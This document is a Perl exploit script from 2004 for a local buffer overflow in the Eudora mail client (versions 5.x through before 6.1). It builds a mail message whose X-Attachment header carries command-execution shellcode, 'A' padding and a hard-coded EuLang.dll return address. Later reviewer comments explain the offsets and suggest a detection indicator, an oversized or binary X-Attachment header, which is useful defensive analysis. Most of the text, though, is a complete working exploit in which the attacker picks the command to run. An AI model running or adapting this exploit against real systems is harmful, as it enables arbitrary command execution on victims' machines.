# Author: LibX (libx@easydoesit.com)
# Date: 29-06-2004
# Exploit #: 1
# Program: Eudora
# Tested on: v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)
# Exploit Type: Local Buffer overflow
# Shellcode: Shellcode to execute a command
# Shellcode version: v2.5 PRIVATE (GENERIC)
# How-to-use: EudExploit.pl > .sta
#   (the argument placeholders appear to have been lost when the page was
#   extracted; the sample string below passes a command as the first argument
#   and redirects stdout to a .sta file)
#
# What the script does: it writes a small mail-style message to stdout whose
# X-Attachment header value is payload + padding + a 4-byte address.
#
# Reviewer notes (defensive reading):
#   - The banner string gives the affected range as "v5.x to <6.1"; that
#     implies 6.1 is the first unaffected release -- confirm against the
#     vendor advisory before relying on it.
#   - Indicator suggested by the code below: an X-Attachment header value of
#     272 bytes or more (268 + 4), or one containing bytes outside printable
#     ASCII. Match on the oversized or binary header rather than on exact
#     payload bytes, because the embedded command string is variable.
#   - .sta is presumably a Eudora stationery file -- confirm; stored files of
#     that type are a place to look for the indicator above.

# Print usage and stop when the first argument is missing or evaluates false.
if(!($ARGV[0])) {
    print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5");
    print("Usage: EudExploit.pl > .sta\n\n");
    print("Sample: EudExploit.pl notepad.exe > TestShell.sta");
    exit;
}

# command execution shellcode
# The first command-line argument is appended to the fixed byte string
# unmodified, followed by a single \xFF byte.
$shellcode = "\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .
             "\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .
             "\xD9\x29\xD9\x81\xC7\x10\x11\x11" .
             "\x11\x81\xEF\x11\x11\x11\x11\xFE" .
             "\x07\x81\xC1\x10\x11\x11\x11\x81" .
             "\xE9\x11\x11\x11\x11\x29\xCF\x31" .
             "\xF6\x46\x56\x57\xBB\x66\x8B\x45" .
             "\x0C\xB9\x11\x11\x11\x11\xB8\x41" .
             "\x11\x11\x11\x2D\x32\x11\x11\x11" .
             "\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .
             "\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .
             "\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .
             "\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .
             "\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .
             "\x8E\xFF\xFF\xFF" .
             $ARGV[0] . "\xFF";

# Padding: "A" bytes bring payload + padding to 268 bytes, so the 4-byte value
# that follows sits at offset 268 of the header value (presumably where the
# vulnerable parser keeps its saved return address -- the parser is not shown).
$buffer = "A" x (268 - length($shellcode));

# EuLang.dll universal return address (625010E9: call edi)
# The four bytes are that address in little-endian order. A hard-coded
# in-module address like this only holds while the module loads at a
# predictable base.
$return = "\xE9\x10\x50\x62";

# Emit the message: three ordinary headers, then the oversized X-Attachment
# header, then a blank line.
print("From: me\n");
print("To: you\n");
print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");
print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");